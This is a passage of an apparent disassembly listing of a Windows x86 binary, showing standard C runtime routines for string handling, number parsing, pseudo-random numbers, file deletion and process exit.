; sub_41EAB4+97�j ...
xor edx, edx
or eax, 0FFFFFFFFh
div [ebp+arg_8]
mov ecx, edx
mov edx, eax
loc_41EB74: ; CODE XREF: sub_41EAB4+120�j
mov esi, ds:off_4437D8
movzx eax, bl
mov ax, [esi+eax*2]
test al, 4
jz short loc_41EB8D
movsx esi, bl
sub esi, 30h
jmp short loc_41EBAB
; ---------------------------------------------------------------------------
loc_41EB8D: ; CODE XREF: sub_41EAB4+CF�j
test ax, 103h
jz short loc_41EBD6
cmp bl, 61h
jl short loc_41EBA5
cmp bl, 7Ah
jg short loc_41EBA5
movsx esi, bl
sub esi, 20h
jmp short loc_41EBA8
; ---------------------------------------------------------------------------
loc_41EBA5: ; CODE XREF: sub_41EAB4+E2�j
; sub_41EAB4+E7�j
movsx esi, bl
loc_41EBA8: ; CODE XREF: sub_41EAB4+EF�j
add esi, 0FFFFFFC9h
loc_41EBAB: ; CODE XREF: sub_41EAB4+D7�j
cmp esi, [ebp+arg_8]
jnb short loc_41EBD6
or [ebp+arg_C], 8
cmp [ebp+var_4], edx
jb short loc_41EBC5
jnz short loc_41EBBF
cmp esi, ecx
jbe short loc_41EBC5
loc_41EBBF: ; CODE XREF: sub_41EAB4+105�j
or [ebp+arg_C], 4
jmp short loc_41EBD1
; ---------------------------------------------------------------------------
loc_41EBC5: ; CODE XREF: sub_41EAB4+103�j
; sub_41EAB4+109�j
mov eax, [ebp+var_4]
imul eax, [ebp+arg_8]
add eax, esi
mov [ebp+var_4], eax
loc_41EBD1: ; CODE XREF: sub_41EAB4+10F�j
mov bl, [edi]
inc edi
jmp short loc_41EB74
; ---------------------------------------------------------------------------
loc_41EBD6: ; CODE XREF: sub_41EAB4+DD�j
; sub_41EAB4+FA�j
mov ecx, [ebp+arg_C]
dec edi
test cl, 8
jnz short loc_41EBEE
cmp [ebp+arg_4], 0
jz short loc_41EBE8
mov edi, [ebp+arg_0]
loc_41EBE8: ; CODE XREF: sub_41EAB4+12F�j
and [ebp+var_4], 0
jmp short loc_41EC3B
; ---------------------------------------------------------------------------
loc_41EBEE: ; CODE XREF: sub_41EAB4+129�j
test cl, 4
mov eax, 7FFFFFFFh
jnz short loc_41EC16
test cl, 1
jnz short loc_41EC3B
mov edx, ecx
and edx, 2
jz short loc_41EC0D
cmp [ebp+var_4], 80000000h
ja short loc_41EC16
loc_41EC0D: ; CODE XREF: sub_41EAB4+14E�j
test edx, edx
jnz short loc_41EC3B
cmp [ebp+var_4], eax
jbe short loc_41EC3B
loc_41EC16: ; CODE XREF: sub_41EAB4+142�j
; sub_41EAB4+157�j
test cl, 1
mov ds:dword_4E28F4, 22h
jz short loc_41EC2B
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41EC3B
; ---------------------------------------------------------------------------
loc_41EC2B: ; CODE XREF: sub_41EAB4+16F�j
mov dl, cl
and dl, 2
neg dl
sbb edx, edx
neg edx
add edx, eax
mov [ebp+var_4], edx
loc_41EC3B: ; CODE XREF: sub_41EAB4+138�j
; sub_41EAB4+147�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_41EC44
mov [eax], edi
loc_41EC44: ; CODE XREF: sub_41EAB4+18C�j
test cl, 2
jz short loc_41EC4C
neg [ebp+var_4]
loc_41EC4C: ; CODE XREF: sub_41EAB4+193�j
mov eax, [ebp+var_4]
jmp short loc_41EC5C
; ---------------------------------------------------------------------------
loc_41EC51: ; CODE XREF: sub_41EAB4+59�j
; sub_41EAB4+62�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_41EC5A
mov [eax], esi
loc_41EC5A: ; CODE XREF: sub_41EAB4+1A2�j
xor eax, eax
loc_41EC5C: ; CODE XREF: sub_41EAB4+19B�j
pop edi
pop esi
pop ebx
leave
retn
sub_41EAB4 endp
; =============== S U B R O U T I N E =======================================
sub_41EC61 proc near ; CODE XREF: sub_40274D+5ED3�p
; sub_40274D+66F5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41EAB4
add esp, 10h
retn
sub_41EC61 endp
; =============== S U B R O U T I N E =======================================
sub_41EC78 proc near ; CODE XREF: sub_40274D+5685�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_42B02C ; DeleteFileA
test eax, eax
jnz short loc_41EC8E
call ds:dword_42B01C ; RtlGetLastWin32Error
jmp short loc_41EC90
; ---------------------------------------------------------------------------
loc_41EC8E: ; CODE XREF: sub_41EC78+C�j
xor eax, eax
loc_41EC90: ; CODE XREF: sub_41EC78+14�j
test eax, eax
jz short loc_41EC9F
push eax
call sub_422C0F
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_41EC9F: ; CODE XREF: sub_41EC78+1A�j
xor eax, eax
retn
sub_41EC78 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ECA2 proc near ; CODE XREF: sub_40274D+55F4�p
; sub_40E3B2+181�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call sub_422C6E
mov esi, eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4222C8
push [ebp+arg_0]
mov edi, eax
push esi
call sub_422CF6
add esp, 18h
mov eax, edi
pop edi
pop esi
pop ebp
retn
sub_41ECA2 endp
; =============== S U B R O U T I N E =======================================
sub_41ECD4 proc near ; CODE XREF: sub_40274D+2F87�p
; sub_40274D+3268�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_4434F0, eax
retn
sub_41ECD4 endp
; =============== S U B R O U T I N E =======================================
sub_41ECDE proc near ; CODE XREF: sub_40274D:loc_4033C5�p
; sub_40274D+326D�p ...
mov eax, ds:dword_4434F0
imul eax, 343FDh
add eax, 269EC3h
mov ds:dword_4434F0, eax
xor eax, eax
mov ax, word ptr ds:dword_4434F0+2
and eax, 7FFFh
retn
sub_41ECDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ED01 proc near ; CODE XREF: sub_40274D+1FC4�p
; sub_40A263+F3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_41E1C0
cmp eax, 1
pop ecx
jb short loc_41ED3D
cmp byte ptr [ebx+1], 3Ah
jnz short loc_41ED3D
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_41ED39
push 2
push ebx
push esi
call sub_42311A
add esp, 0Ch
mov byte ptr [esi+2], 0
loc_41ED39: ; CODE XREF: sub_41ED01+26�j
inc ebx
inc ebx
jmp short loc_41ED47
; ---------------------------------------------------------------------------
loc_41ED3D: ; CODE XREF: sub_41ED01+19�j
; sub_41ED01+1F�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_41ED47
mov byte ptr [eax], 0
loc_41ED47: ; CODE XREF: sub_41ED01+3A�j
; sub_41ED01+41�j
and [ebp+arg_0], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov [ebp+var_8], eax
mov esi, 0FFh
jz short loc_41EDBF
loc_41ED5A: ; CODE XREF: sub_41ED01+88�j
mov cl, [eax]
movzx edx, cl
test ds:byte_4E2CC1[edx], 4
jz short loc_41ED6B
inc eax
jmp short loc_41ED85
; ---------------------------------------------------------------------------
loc_41ED6B: ; CODE XREF: sub_41ED01+65�j
cmp cl, 2Fh
jz short loc_41ED7F
cmp cl, 5Ch
jz short loc_41ED7F
cmp cl, 2Eh
jnz short loc_41ED85
mov [ebp+var_4], eax
jmp short loc_41ED85
; ---------------------------------------------------------------------------
loc_41ED7F: ; CODE XREF: sub_41ED01+6D�j
; sub_41ED01+72�j
lea ecx, [eax+1]
mov [ebp+arg_0], ecx
loc_41ED85: ; CODE XREF: sub_41ED01+68�j
; sub_41ED01+77�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_41ED5A
mov edi, [ebp+arg_0]
test edi, edi
mov [ebp+var_8], eax
jz short loc_41EDBF
cmp [ebp+arg_8], 0
jz short loc_41EDBA
sub edi, ebx
cmp edi, esi
jb short loc_41EDA3
mov edi, esi
loc_41EDA3: ; CODE XREF: sub_41ED01+9E�j
push edi
push ebx
push [ebp+arg_8]
call sub_42311A
mov eax, [ebp+arg_8]
mov byte ptr [edi+eax], 0
mov eax, [ebp+var_8]
add esp, 0Ch
loc_41EDBA: ; CODE XREF: sub_41ED01+98�j
mov ebx, [ebp+arg_0]
jmp short loc_41EDC9
; ---------------------------------------------------------------------------
loc_41EDBF: ; CODE XREF: sub_41ED01+57�j
; sub_41ED01+92�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_41EDC9
mov byte ptr [ecx], 0
loc_41EDC9: ; CODE XREF: sub_41ED01+BC�j
; sub_41ED01+C3�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_41EE1C
cmp edi, ebx
jb short loc_41EE1C
cmp [ebp+arg_C], 0
jz short loc_41EDF9
sub edi, ebx
cmp edi, esi
jb short loc_41EDE2
mov edi, esi
loc_41EDE2: ; CODE XREF: sub_41ED01+DD�j
push edi
push ebx
push [ebp+arg_C]
call sub_42311A
mov eax, [ebp+arg_C]
mov byte ptr [edi+eax], 0
mov eax, [ebp+var_8]
add esp, 0Ch
loc_41EDF9: ; CODE XREF: sub_41ED01+D7�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_41EE44
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_41EE09
mov esi, eax
loc_41EE09: ; CODE XREF: sub_41ED01+104�j
push esi
push [ebp+var_4]
push edi
call sub_42311A
add esp, 0Ch
mov byte ptr [esi+edi], 0
jmp short loc_41EE44
; ---------------------------------------------------------------------------
loc_41EE1C: ; CODE XREF: sub_41ED01+CD�j
; sub_41ED01+D1�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_41EE3A
sub eax, ebx
cmp eax, esi
jnb short loc_41EE2B
mov esi, eax
loc_41EE2B: ; CODE XREF: sub_41ED01+126�j
push esi
push ebx
push edi
call sub_42311A
add esp, 0Ch
mov byte ptr [esi+edi], 0
loc_41EE3A: ; CODE XREF: sub_41ED01+120�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_41EE44
mov byte ptr [eax], 0
loc_41EE44: ; CODE XREF: sub_41ED01+FD�j
; sub_41ED01+119�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41ED01 endp
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
dd 0CCCCCCCCh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EE50 proc near ; CODE XREF: sub_40274D+1C92�p
; sub_40274D+1CB1�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
add ecx, 1
neg ecx
sub edi, 1
mov al, [ebp+arg_4]
std
repne scasb
add edi, 1
cmp [edi], al
jz short loc_41EE77
xor eax, eax
jmp short loc_41EE79
; ---------------------------------------------------------------------------
loc_41EE77: ; CODE XREF: sub_41EE50+21�j
mov eax, edi
loc_41EE79: ; CODE XREF: sub_41EE50+25�j
cld
pop edi
leave
retn
sub_41EE50 endp
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EE80 proc near ; CODE XREF: sub_40274D+7A0�p
; seg000:004246D0�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_41EEB2
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_41EEB0
jz short loc_41EEB2
sub ecx, 2
loc_41EEB0: ; CODE XREF: sub_41EE80+29�j
not ecx
loc_41EEB2: ; CODE XREF: sub_41EE80+9�j
; sub_41EE80+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_41EE80 endp
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
dd 0CCCCCCCCh
; =============== S U B R O U T I N E =======================================
sub_41EEC0 proc near ; CODE XREF: sub_40274D+3D4�p
; sub_40274D+2DED�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_41EF35
sub_41EEC0 endp
; ---------------------------------------------------------------------------
db 8Dh
dd 24A4h, 0FF8B0000h
; =============== S U B R O U T I N E =======================================
sub_41EED0 proc near ; CODE XREF: sub_40274D+3DD�p
; sub_40274D+7210�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_41EEF0
loc_41EEDD: ; CODE XREF: sub_41EED0+1C�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_41EF23
test ecx, 3
jnz short loc_41EEDD
mov edi, edi
loc_41EEF0: ; CODE XREF: sub_41EED0+B�j
; sub_41EED0+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_41EEF0
mov eax, [ecx-4]
test al, al
jz short loc_41EF32
test ah, ah
jz short loc_41EF2D
test eax, 0FF0000h
jz short loc_41EF28
test eax, 0FF000000h
jz short loc_41EF23
jmp short loc_41EEF0
; ---------------------------------------------------------------------------
loc_41EF23: ; CODE XREF: sub_41EED0+14�j
; sub_41EED0+4F�j
lea edi, [ecx-1]
jmp short loc_41EF35
; ---------------------------------------------------------------------------
loc_41EF28: ; CODE XREF: sub_41EED0+48�j
lea edi, [ecx-2]
jmp short loc_41EF35
; ---------------------------------------------------------------------------
loc_41EF2D: ; CODE XREF: sub_41EED0+41�j
lea edi, [ecx-3]
jmp short loc_41EF35
; ---------------------------------------------------------------------------
loc_41EF32: ; CODE XREF: sub_41EED0+3D�j
lea edi, [ecx-4]
loc_41EF35: ; CODE XREF: sub_41EEC0+5�j
; sub_41EED0+56�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_41EF5E
loc_41EF41: ; CODE XREF: sub_41EED0+85�j
mov dl, [ecx]
add ecx, 1
test dl, dl
jz short loc_41EFB0
mov [edi], dl
add edi, 1
test ecx, 3
jnz short loc_41EF41
jmp short loc_41EF5E
; ---------------------------------------------------------------------------
loc_41EF59: ; CODE XREF: sub_41EED0+A6�j
; sub_41EED0+C0�j
mov [edi], edx
add edi, 4
loc_41EF5E: ; CODE XREF: sub_41EED0+6F�j
; sub_41EED0+87�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_41EF59
test dl, dl
jz short loc_41EFB0
test dh, dh
jz short loc_41EFA7
test edx, 0FF0000h
jz short loc_41EF9A
test edx, 0FF000000h
jz short loc_41EF92
jmp short loc_41EF59
; ---------------------------------------------------------------------------
loc_41EF92: ; CODE XREF: sub_41EED0+BE�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41EF9A: ; CODE XREF: sub_41EED0+B6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_41EFA7: ; CODE XREF: sub_41EED0+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41EFB0: ; CODE XREF: sub_41EED0+78�j
; sub_41EED0+AA�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_41EED0 endp
; ---------------------------------------------------------------------------
dd 2 dup(0CCCCCCCCh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41EFD0
loc_41EFC0: ; CODE XREF: sub_41EFD0+1F�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_41EFD0
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
dd 0
dd 24648Dh
; =============== S U B R O U T I N E =======================================
sub_41EFD0 proc near ; CODE XREF: sub_40274D+3B9�p
; sub_40274D+459�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 0041EFC0 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_41EFD6: ; CODE XREF: sub_41F090+74�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_41EFFD
loc_41EFE8: ; CODE XREF: sub_41EFD0+2B�j
mov cl, [edx]
add edx, 1
cmp cl, bl
jz short loc_41EFC0
test cl, cl
jz short loc_41F046
test edx, 3
jnz short loc_41EFE8
loc_41EFFD: ; CODE XREF: sub_41EFD0+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_41F008: ; CODE XREF: sub_41EFD0+63�j
; sub_41EFD0+72�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_41F04A
and eax, 81010100h
jz short loc_41F008
and eax, 1010100h
jnz short loc_41F044
and esi, 80000000h
jnz short loc_41F008
loc_41F044: ; CODE XREF: sub_41EFD0+6A�j
; sub_41EFD0+83�j ...
pop esi
pop edi
loc_41F046: ; CODE XREF: sub_41EFD0+23�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41F04A: ; CODE XREF: sub_41EFD0+5C�j
mov eax, [edx-4]
cmp al, bl
jz short loc_41F087
test al, al
jz short loc_41F044
cmp ah, bl
jz short loc_41F080
test ah, ah
jz short loc_41F044
shr eax, 10h
cmp al, bl
jz short loc_41F079
test al, al
jz short loc_41F044
cmp ah, bl
jz short loc_41F072
test ah, ah
jz short loc_41F044
jmp short loc_41F008
; ---------------------------------------------------------------------------
loc_41F072: ; CODE XREF: sub_41EFD0+9A�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41F079: ; CODE XREF: sub_41EFD0+92�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41F080: ; CODE XREF: sub_41EFD0+87�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41F087: ; CODE XREF: sub_41EFD0+7F�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_41EFD0 endp
; ---------------------------------------------------------------------------
dw 0CCCCh
; =============== S U B R O U T I N E =======================================
sub_41F090 proc near ; CODE XREF: sub_40274D+8D�p
; sub_40274D+21B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_41F110
mov dh, [ecx+1]
test dh, dh
jz short loc_41F0FD
loc_41F0A8: ; CODE XREF: sub_41F090+58�j
; sub_41F090+6B�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
add esi, 1
cmp al, dl
jz short loc_41F0CE
test al, al
jz short loc_41F0C8
loc_41F0BB: ; CODE XREF: sub_41F090+36�j
mov al, [esi]
add esi, 1
loc_41F0C0: ; CODE XREF: sub_41F090+45�j
cmp al, dl
jz short loc_41F0CE
test al, al
jnz short loc_41F0BB
loc_41F0C8: ; CODE XREF: sub_41F090+29�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41F0CE: ; CODE XREF: sub_41F090+25�j
; sub_41F090+32�j
mov al, [esi]
add esi, 1
cmp al, dh
jnz short loc_41F0C0
lea edi, [esi-1]
loc_41F0DA: ; CODE XREF: sub_41F090+69�j
mov ah, [ecx+2]
test ah, ah
jz short loc_41F109
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_41F0A8
mov al, [ecx+3]
test al, al
jz short loc_41F109
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_41F0DA
jmp short loc_41F0A8
; ---------------------------------------------------------------------------
loc_41F0FD: ; CODE XREF: sub_41F090+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_41EFD6
; ---------------------------------------------------------------------------
loc_41F109: ; CODE XREF: sub_41F090+4F�j
; sub_41F090+5F�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_41F110: ; CODE XREF: sub_41F090+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_41F090 endp
; =============== S U B R O U T I N E =======================================
sub_41F116 proc near ; CODE XREF: sub_41F1B0+BA�p
; start-C3207�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
push offset aMscoree_dll ; "mscoree.dll"
call ds:dword_42B024 ; GetModuleHandleA
test eax, eax
jz short loc_41F13B
push offset aCorexitprocess ; "CorExitProcess"
push eax
call ds:dword_42B020 ; GetProcAddress
test eax, eax
jz short loc_41F13B
push [esp+0Ch+var_8]
call eax ; dword_43C03C
loc_41F13B: ; CODE XREF: sub_41F116+D�j
; sub_41F116+1D�j
push [esp+10h+var_C]
call ds:dword_42B000 ; ExitProcess
int 3 ; Trap to Debugger
sub_41F116 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41F146 proc near ; CODE XREF: start-C31AE�p
arg_0 = dword ptr 4
mov eax, ds:off_443788
test eax, eax
jz short loc_41F156
push [esp+arg_0]
call eax ; sub_41FE1A
pop ecx
loc_41F156: ; CODE XREF: sub_41F146+7�j
push esi
push edi
mov ecx, offset dword_43C014
mov edi, offset dword_43C02C
xor eax, eax
cmp ecx, edi
mov esi, ecx
jnb short loc_41F181
loc_41F16A: ; CODE XREF: sub_41F146+35�j
test eax, eax
jnz short loc_41F1AD
mov ecx, [esi]
test ecx, ecx
jz short loc_41F176
call ecx
loc_41F176: ; CODE XREF: sub_41F146+2C�j
add esi, 4
cmp esi, edi
jb short loc_41F16A
test eax, eax
jnz short loc_41F1AD
loc_41F181: ; CODE XREF: sub_41F146+22�j
push offset byte_42329B
call sub_42321D
mov esi, offset dword_43C000
mov eax, esi
mov edi, offset dword_43C010
cmp eax, edi
pop ecx
jnb short loc_41F1AB
loc_41F19C: ; CODE XREF: sub_41F146+63�j
mov eax, [esi]
test eax, eax
jz short loc_41F1A4
call eax
loc_41F1A4: ; CODE XREF: sub_41F146+5A�j
add esi, 4
cmp esi, edi
jb short loc_41F19C
loc_41F1AB: ; CODE XREF: sub_41F146+54�j
xor eax, eax
loc_41F1AD: ; CODE XREF: sub_41F146+26�j
; sub_41F146+39�j
pop edi
pop esi
retn
sub_41F146 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F1B0 proc near ; CODE XREF: sub_41F271+8�p
; sub_41F282+8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
xor esi, esi
inc esi
cmp ds:dword_4E2940, esi
push edi
jnz short loc_41F1D0
push [ebp+arg_0]
call ds:dword_42B09C ; GetCurrentProcess
push eax
call ds:dword_42B094 ; TerminateProcess
loc_41F1D0: ; CODE XREF: sub_41F1B0+E�j
cmp [ebp+arg_4], 0
mov al, byte ptr [ebp+arg_8]
mov ds:dword_4E293C, esi
mov ds:byte_4E2938, al
jnz short loc_41F236
mov ecx, ds:dword_4E3F2C
test ecx, ecx
jz short loc_41F217
mov eax, ds:dword_4E3F28
sub eax, 4
cmp eax, ecx
jmp short loc_41F210
; ---------------------------------------------------------------------------
loc_41F1FA: ; CODE XREF: sub_41F1B0+65�j
mov eax, [eax]
test eax, eax
jz short loc_41F202
call eax
loc_41F202: ; CODE XREF: sub_41F1B0+4E�j
mov eax, ds:dword_4E3F28
sub eax, 4
cmp eax, ds:dword_4E3F2C
loc_41F210: ; CODE XREF: sub_41F1B0+48�j
mov ds:dword_4E3F28, eax
jnb short loc_41F1FA
loc_41F217: ; CODE XREF: sub_41F1B0+3C�j
mov eax, offset dword_43C030
mov esi, offset dword_43C038
cmp eax, esi
mov edi, eax
jnb short loc_41F236
loc_41F227: ; CODE XREF: sub_41F1B0+84�j
mov eax, [edi]
test eax, eax
jz short loc_41F22F
call eax
loc_41F22F: ; CODE XREF: sub_41F1B0+7B�j
add edi, 4
cmp edi, esi
jb short loc_41F227
loc_41F236: ; CODE XREF: sub_41F1B0+32�j
; sub_41F1B0+75�j
mov eax, offset dword_43C03C
mov esi, offset dword_43C044
cmp eax, esi
mov edi, eax
jnb short loc_41F255
loc_41F246: ; CODE XREF: sub_41F1B0+A3�j
mov eax, [edi]
test eax, eax
jz short loc_41F24E
call eax
loc_41F24E: ; CODE XREF: sub_41F1B0+9A�j
add edi, 4
cmp edi, esi
jb short loc_41F246
loc_41F255: ; CODE XREF: sub_41F1B0+94�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jnz short loc_41F26F
push [ebp+arg_0]
mov ds:dword_4E2940, 1
call sub_41F116
loc_41F26F: ; CODE XREF: sub_41F1B0+AB�j
pop ebp
retn
sub_41F1B0 endp
; =============== S U B R O U T I N E =======================================
sub_41F271 proc near ; CODE XREF: start-C315D�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_41F1B0
add esp, 0Ch
retn
sub_41F271 endp
; =============== S U B R O U T I N E =======================================
sub_41F282 proc near ; CODE XREF: sub_420CE8+1C�p
; sub_426FC0+142�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_41F1B0
add esp, 0Ch
retn
sub_41F282 endp
; =============== S U B R O U T I N E =======================================
sub_41F293 proc near ; CODE XREF: start:loc_420EA8�p
push 1
push 0
push 0
call sub_41F1B0
add esp, 0Ch
retn
sub_41F293 endp
; ---------------------------------------------------------------------------
dw 16Ah
dd 6A016Ah, 0FFFF03E8h, 0CC483FFh, 0CCCCCCC3h, 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
sub_41F2C0 proc near ; CODE XREF: sub_40AAE6+82�p
; sub_40B3C5+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_41F384
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_41F2EC
loc_41F2DB: ; CODE XREF: sub_41F2C0+2A�j
mov al, [edi]
add edi, 1
test al, al
jz short loc_41F31D
test edi, 3
jnz short loc_41F2DB
loc_41F2EC: ; CODE XREF: sub_41F2C0+19�j
; sub_41F2C0+42�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_41F2EC
mov eax, [edi-4]
test al, al
jz short loc_41F32C
test ah, ah
jz short loc_41F327
test eax, 0FF0000h
jz short loc_41F322
test eax, 0FF000000h
jnz short loc_41F2EC
loc_41F31D: ; CODE XREF: sub_41F2C0+22�j
sub edi, 1
jmp short loc_41F32F
; ---------------------------------------------------------------------------
loc_41F322: ; CODE XREF: sub_41F2C0+54�j
sub edi, 2
jmp short loc_41F32F
; ---------------------------------------------------------------------------
loc_41F327: ; CODE XREF: sub_41F2C0+4D�j
sub edi, 3
jmp short loc_41F32F
; ---------------------------------------------------------------------------
loc_41F32C: ; CODE XREF: sub_41F2C0+49�j
sub edi, 4
loc_41F32F: ; CODE XREF: sub_41F2C0+60�j
; sub_41F2C0+65�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_41F344
mov ebx, ecx
shr ecx, 2
jnz short loc_41F39E
jmp short loc_41F366
; ---------------------------------------------------------------------------
loc_41F344: ; CODE XREF: sub_41F2C0+79�j
; sub_41F2C0+9D�j
mov dl, [esi]
add esi, 1
test dl, dl
jz short loc_41F38A
mov [edi], dl
add edi, 1
sub ecx, 1
jz short loc_41F380
test esi, 3
jnz short loc_41F344
mov ebx, ecx
shr ecx, 2
jnz short loc_41F39E
loc_41F366: ; CODE XREF: sub_41F2C0+82�j
; sub_41F2C0+DC�j
mov ecx, ebx
and ecx, 3
jz short loc_41F380
loc_41F36D: ; CODE XREF: sub_41F2C0+BE�j
mov dl, [esi]
add esi, 1
mov [edi], dl
add edi, 1
test dl, dl
jz short loc_41F382
sub ecx, 1
jnz short loc_41F36D
loc_41F380: ; CODE XREF: sub_41F2C0+95�j
; sub_41F2C0+AB�j
mov [edi], cl
loc_41F382: ; CODE XREF: sub_41F2C0+B9�j
pop ebx
pop esi
loc_41F384: ; CODE XREF: sub_41F2C0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41F38A: ; CODE XREF: sub_41F2C0+8B�j
; sub_41F2C0+FA�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
